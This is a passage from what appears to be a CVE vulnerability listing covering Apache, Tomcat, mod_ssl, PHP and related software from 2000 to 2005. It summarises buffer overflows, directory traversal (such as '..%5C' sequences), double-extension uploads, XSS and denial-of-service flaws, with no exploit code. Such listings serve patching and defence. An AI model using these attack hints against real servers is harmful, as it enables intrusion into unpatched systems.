14261| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
14262| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
14263| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
14264| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
14265| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
14266| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
14267| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
14268| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
14269| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
14270| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
14271| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
14272| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
14273| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
14274| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
14275| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
14276| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
14277| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
14278| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
14279| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
14280| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
14281| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
14282| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
14283| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
14284| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
14285| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
14286| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
14287| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
14288| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
14289| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
14290| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
14291| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
14292| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
14293| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
14294| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
14295| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
14296| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
14297| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
14298| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
14299| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
14300| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
14301| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
14302| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
14303| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
14304| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
14305| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
14306| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
14307| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
14308| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
14309| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
14310| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
14311| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
14312| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
14313| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
14314| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
14315| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
14316| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
14317| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
14318| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
14319| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
14320| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
14321| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
14322| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
14323| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
14324| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
14325| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
14326| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
14327| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
14328| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
14329| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
14330| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
14331| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
14332| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
14333| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
14334| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
14335| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
14336| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
14337| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
14338| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
14339| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
14340| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
14341| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
14342| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
14343| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
14344| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
14345| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
14346| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
14347| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
14348| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
14349| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
14350| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
14351| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
14352| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
14353| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
14354| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
14355| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
14356| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
14357| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
14358| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
14359| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
14360| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
14361| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
14362| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
14363| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
14364| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
14365| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
14366| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
14367| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
14368| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
14369| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
14370| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
14371| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
14372| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
14373| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
14374| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
14375| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
14376| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
14377| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
14378| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
14379| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
14380| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
14381| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
14382| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
14383| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
14384| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
14385| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
14386| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
14387| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
14388| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
14389| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
14390| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
14391| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
14392| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
14393| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
14394| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
14395| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
14396| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
14397| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
14398| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
14399| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
14400| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
14401| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
14402| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
14403| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
